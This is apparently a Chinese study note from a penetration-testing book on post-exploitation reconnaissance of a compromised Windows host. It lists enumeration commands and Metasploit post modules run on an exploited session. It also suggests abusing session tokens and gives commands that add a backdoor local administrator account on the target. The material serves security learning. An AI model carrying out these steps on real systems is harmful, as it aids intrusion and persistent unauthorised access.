he11的农场

书中相关工具连接：
https://yunjing.ichunqiu.com/book/2
1.查看当前用户，权限
查看当前用户，以及所属组，所拥有特权信息
whoami /all

2.查看网络配置信息
查看当前主机网络配置情况，主机IP地址，主机名，各个网络适配器信息等，判断当前主机所处内网网段。
值得注意的是DNS服务器的IP地址，在域中域控制器通常与DNS服务器IP地址相同。
ipconfig /all

3.查看主机路由
查看子网掩码为 255.255.255.0的网络目标，及是所需网段
route print

4.查看操作系统信息
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" 查看操作系统及其版本
systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本" 查看操作系统及其版本

5.查看端口连接信息
查看主机端口连接情况。
netstat -ano

6.查看当前会话列表
查看当前主机与所连接的客户端之间的会话。
如果我们获得了一台Windows主机的权限，在上面发现了net session，就可以利用这个net session，使用net session的token创建进程。
net session

7.查看网络共享信息
net share

8.查看已连接的网络共享
查看当前主机与其他远程主机建立的网络共享连接
net use

9.查看当前进程信息
查看主机所有进程的信息
tasklist
tasklist /SVC
在线网站：
https://www.ddosi.org/av/1.php
https://maikefee.com/
http://payloads.net/

wmic查看主机进程信息（路径，名称，PID）
wmic process get Name,ProcessId,ExecutablePath
查看某进程的路径
wmic process where Name="WMIC.exe" get ExecutablePath

10.查看当前服务信息
查看当前所有服务的信息，并过滤出服务的说明，名称，路径，创建时间，运行状态
wmic service get Caption,Name,Pathname,StartName,State
查看某服务所有的信息，并过滤出服务的说明，名称，路径，创建时间，运行状态
wmic service where Name="backdoor" get Caption,Name,Pathname,StartName,State

11.查看计划任务信息
schtasks /query /v /fo list

12.查看自启程序信息
wmic startup get Caption,Command,Location,User

13.查看系统补丁安装信息
查看补丁列表，并过滤补丁连接，名称，描述，补丁编号以及安装时间。可根据操作系统版本和缺少的补丁来辅助提权。
wmic qfe get Caption,CSName,Description,HotFixID,InstalledOn

14.查看应用安装信息
https://mp.weixin.qq.com/s/CAEtoKe6ijO39xMVZPRKkw
安装应用名称，版本
wmic product get Caption,Version

powershell.exe "Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -AutoSize"

msf:

msf5 exploit(windows/misc/hta_server) > use post/windows/gather/enum_applications
msf5 post(windows/gather/enum_applications) > set session 1
msf5 post(windows/gather/enum_applications) > exploit

meterpreter > run get_application_list

15.本地用户/组信息
查看本地用户信息
net user
查看本地某用户的详细信息
net user <username>

查看本地管理员组的信息，其中包含全局组用户（生于林作用域）该用户在计算机加入域时自动被添加到本地管理员组
net localgroup administrators

在目标主机本地创建一个新用户，并加入本地管理员组。
net user <username> <passsword> /add 创建本地用户
net localgroup administrators <username> /add 加入本地管理员组

16.当前登录的用户
一些用户通过远程登录，登录到当前计算机会产生多个会话。
query user